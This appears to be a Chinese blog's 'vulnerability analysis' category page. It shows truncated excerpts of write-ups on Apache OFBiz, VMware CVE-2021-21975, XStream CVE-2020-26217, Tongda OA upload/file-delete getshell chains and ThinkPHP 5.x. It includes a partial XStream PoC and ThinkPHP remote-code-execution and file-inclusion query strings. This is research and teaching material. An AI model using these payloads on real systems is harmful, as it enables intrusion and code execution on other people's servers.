分类 漏洞分析 下的文章
首发360 cert官网:https://cert.360.cn/report/detail?id=931e631529a7025cdd60e60819e4a601漏洞概述该漏洞允许未经身份认证的用户调用任意Bean里的任意方法,当调用一个恶意方法时会导致任意代码执行。漏洞分析调用任意Bean里面任意方法漏洞触发点位于servicesProxygenController#invokeService可以看到我们传入的beanIdOrClassName和methodName以及从请求包提取的body被当作参数传入invokeService方法这里通过getBean获取到Bean,接着获取这个Bean里面的所有方法存入数组var8,var7保存数组var8的长度。接下来进入循环,遍历Bean里面每一个方法,当遍历到的方法为传入的methodName时,获取body里面键为methodInput的
影响版本Apache OFBiz < 17.12.07环境搭建这里使用Apache OFBiz 17.12.06、jdk8u202搭建环境,配置如下然后编译即可编译完成后会生成一个build目录然后配置JAR Application这里的jre版本是OFBiz运行版本,上面的8u202是Gradle编译时用的版本漏洞分析diff如下可以看到这里新增了黑名单DEFAULT_DENYLIST,内容为rmi和<,猜测可能是处理数据时出现的安全问题。和CVE-2021-26295一样,在framework\webapp\src\main\java\org\apache\ofbiz\webapp\event\SOAPEventHandler.java#invoke开始跟进SoapSerializer#deserialize跟进XmlSerializer#deserialize跟进Xmls
首发360 cert官网:https://cert.360.cn/report/detail?id=1dfca2f7080257c33272167afbf4e276CVE-2021-21975漏洞复现漏洞分析位于casa/WEB-INF/classes/com/vmware/ops/casa/api/ClusterDefinitionController.class有一个路由/nodes/thumbprints这里接收POST传入的值作为address传入getNodesThumbprints方法,跟进ClusterDefinitionService#getNodesThumbprints这里实例化了一个HttpMapFunction类并调用了execute方法,可以看到返回的结果保存在response中,后面就是对返回结果的处理,从变量名和后面操作的行为就可以猜测execute方法里面就
XMLEncoder&XMLDecoderXMLDecoder/XMLEncoder 是在JDK1.4版中添加的 XML 格式序列化持久性方案,使用 XMLEncoder 来生成表示 JavaBeans 组件(bean)的 XML 文档,用 XMLDecoder 读取使用 XMLEncoder 创建的XML文档获取JavaBeans。XMLEncoder例子代码如下package ghtwf01.demo;
import javax.swing.*;
import java.beans.XMLEncoder;
import java.io.BufferedOutputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
public class XmlEncoder {
pu
影响范围Xstream <= 1.4.14CVE-2020-26217漏洞复现poc:<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlD
影响范围V11.3版2017版2016版2015版2013版2013增强版漏洞简介通过未授权访问进入上传点上传图片马,使用任意文件包含getshell漏洞分析未授权访问文件上传漏洞点位于/ispirit/im/upload.php,首先看到如下代码$P = $_POST["P"];
if (isset($P) || ($P != "")) {
ob_start();
include_once "inc/session.php";
session_id($P);
session_start();
session_write_close();
}
else {
include_once "./auth.php";
}auth.php是进行身份认证相关的,如果我们POS
影响范围通达OA V11.6漏洞简介通过任意文件漏洞删除上传点包含的身份验证文件,从而造成未授权访问实现任意文件上传漏洞分析任意文件删除漏洞触发点位于module/appbuilder/assets/print.php$s_tmp = __DIR__ . "/../../../../logs/appbuilder/logs";
$s_tmp .= "/" . $_GET["guid"];
if (file_exists($s_tmp)) {
$arr_data = unserialize(file_get_contents($s_tmp));
unlink($s_tmp);
$s_user = $arr_data["user"];
}
else {
echo "未知参
首发先知社区:https://xz.aliyun.com/t/8312漏洞复现5.0.x?s=index/think\config/get&name=database.username # 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg # 包含任意文件
?s=index/\think\Config/load&file=../../t.php # 包含任意.php文件
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami5.1.x?s=index/\think\Request/input&filter[]=system&